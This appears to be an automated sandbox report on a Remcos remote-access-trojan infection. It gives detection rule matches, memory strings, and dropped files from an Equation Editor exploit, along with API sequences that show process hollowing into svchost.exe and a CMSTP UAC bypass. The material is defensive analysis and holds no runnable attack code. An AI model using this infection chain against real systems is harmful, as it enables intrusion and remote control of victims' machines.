Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Binary is likely a compiled AutoIt script file

Source: CKK.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CKK.exe, 00000003.00000000.458425358.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2c03a176-f
Source: CKK.exe, 00000003.00000000.458425358.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_9b6eddfe-f
Source: CKK.exe, 00000003.00000003.795866045.0000000002CB1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_fa3e8400-4
Source: CKK.exe, 00000003.00000003.795866045.0000000002CB1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_33e9f316-b
Source: deblaterate.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: deblaterate.exe, 00000006.00000002.800878386.0000000000E02000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_78d549d8-5
Source: deblaterate.exe, 00000006.00000002.800878386.0000000000E02000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_562c7e7a-8
Source: deblaterate.exe, 0000000E.00000000.825941760.0000000001352000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c3fe7874-e
Source: deblaterate.exe, 0000000E.00000000.825941760.0000000001352000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_88d26690-c
Source: deblaterate.exe.3.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_056348b3-3
Source: deblaterate.exe.3.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_623f79e0-d

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Roaming\CKK.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Roaming\CKK.exe	Process Stats: CPU usage > 49%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	7_2_004180EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	7_2_004132D2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,	7_2_0041BB09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,	7_2_0041BB35

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A5D5EB: CreateFileW,DeviceIoControl,CloseHandle,

3_2_00A5D5EB

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

3_2_00A51201

Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A5E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	3_2_00A5E8F6
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DAE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	6_2_00DAE8F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,	7_2_004167B4

Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A62046	3_2_00A62046
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_009F8060	3_2_009F8060
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A58298	3_2_00A58298
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A2E4FF	3_2_00A2E4FF
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A2676B	3_2_00A2676B
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A84873	3_2_00A84873
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A1CAA0	3_2_00A1CAA0
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_009FCAF0	3_2_009FCAF0
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A0CC39	3_2_00A0CC39
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A26DD9	3_2_00A26DD9
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_009F91C0	3_2_009F91C0
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A0B119	3_2_00A0B119
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A11394	3_2_00A11394
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A11706	3_2_00A11706
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A1781B	3_2_00A1781B
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A119B0	3_2_00A119B0
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_009F7920	3_2_009F7920
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A0997D	3_2_00A0997D
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A17A4A	3_2_00A17A4A
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A17CA7	3_2_00A17CA7
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A11C77	3_2_00A11C77
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A29EEE	3_2_00A29EEE
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A7BE44	3_2_00A7BE44
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A11F32	3_2_00A11F32
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00193690	3_2_00193690
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D4BF40	6_2_00D4BF40
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB2046	6_2_00DB2046
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D48060	6_2_00D48060
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DA8298	6_2_00DA8298
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D7E4FF	6_2_00D7E4FF
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D7676B	6_2_00D7676B
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DD4873	6_2_00DD4873
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D4CAF0	6_2_00D4CAF0
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D6CAA0	6_2_00D6CAA0
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D5CC39	6_2_00D5CC39
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D76DD9	6_2_00D76DD9
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D491C0	6_2_00D491C0
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D5B119	6_2_00D5B119
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D61394	6_2_00D61394
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D61706	6_2_00D61706
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D6781B	6_2_00D6781B
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D619B0	6_2_00D619B0
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D5997D	6_2_00D5997D
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D47920	6_2_00D47920
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D67A4A	6_2_00D67A4A
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D67CA7	6_2_00D67CA7
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D61C77	6_2_00D61C77
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D79EEE	6_2_00D79EEE
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DCBE44	6_2_00DCBE44
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D61F32	6_2_00D61F32
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00113690	6_2_00113690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043E0CC	7_2_0043E0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041F0FA	7_2_0041F0FA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00454159	7_2_00454159
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00438168	7_2_00438168
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004461F0	7_2_004461F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043E2FB	7_2_0043E2FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0045332B	7_2_0045332B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0042739D	7_2_0042739D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004374E6	7_2_004374E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043E558	7_2_0043E558
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00438770	7_2_00438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004378FE	7_2_004378FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00433946	7_2_00433946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044D9C9	7_2_0044D9C9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00427A46	7_2_00427A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041DB62	7_2_0041DB62
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00427BAF	7_2_00427BAF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00437D33	7_2_00437D33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00435E5E	7_2_00435E5E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00426E0E	7_2_00426E0E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043DE9D	7_2_0043DE9D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00413FCA	7_2_00413FCA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00436FEA	7_2_00436FEA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10017194	7_2_10017194
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_1000B5C1	7_2_1000B5C1

Source: 202404294766578200.xlam.xlsx

